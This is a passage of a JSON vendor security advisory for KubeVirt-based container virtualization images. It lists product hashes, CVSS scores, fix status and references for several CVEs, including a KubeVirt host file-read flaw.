"8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64",
"8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64",
"8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: syscall: don\u0027t close fd 0 on ForkExec error"
},
{
"acknowledgments": [
{
"names": [
"Oliver Brooks and James Klopchic"
],
"organization": "NCC Group"
}
],
"cve": "CVE-2022-1798",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"discovery_date": "2022-08-12T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64",
"8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64",
"8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64",
"8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64",
"8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64",
"8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64",
"8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2117872"
}
],
"notes": [
{
"category": "description",
"text": "An arbitrary file read vulnerability was found in the kubeVirt API. This flaw makes it possible to use the kubeVirt API to provide access to host files (like /etc/passwd, for example) in a KubeVirt VM as a disk device that can be written to and read from.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kubeVirt: Arbitrary file read on the host from KubeVirt VMs",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64"
],
"known_not_affected": [
"8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64",
"8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64",
"8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64",
"8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64",
"8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64",
"8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64",
"8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2022-1798"
},
{
"category": "external",
"summary": "RHBZ#2117872",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2117872"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2022-1798",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1798"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-1798",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1798"
},
{
"category": "external",
"summary": "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm",
"url": "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm"
}
],
"release_date": "2022-08-08T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2022-09-14T19:28:51+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2022:6526"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "kubeVirt: Arbitrary file read on the host from KubeVirt VMs"
},
{
"cve": "CVE-2022-21698",
"cwe": {
"id": "CWE-772",
"name": "Missing Release of Resource after Effective Lifetime"
},
"discovery_date": "2022-01-19T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64",
"8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64",
"8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64",
"8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64",
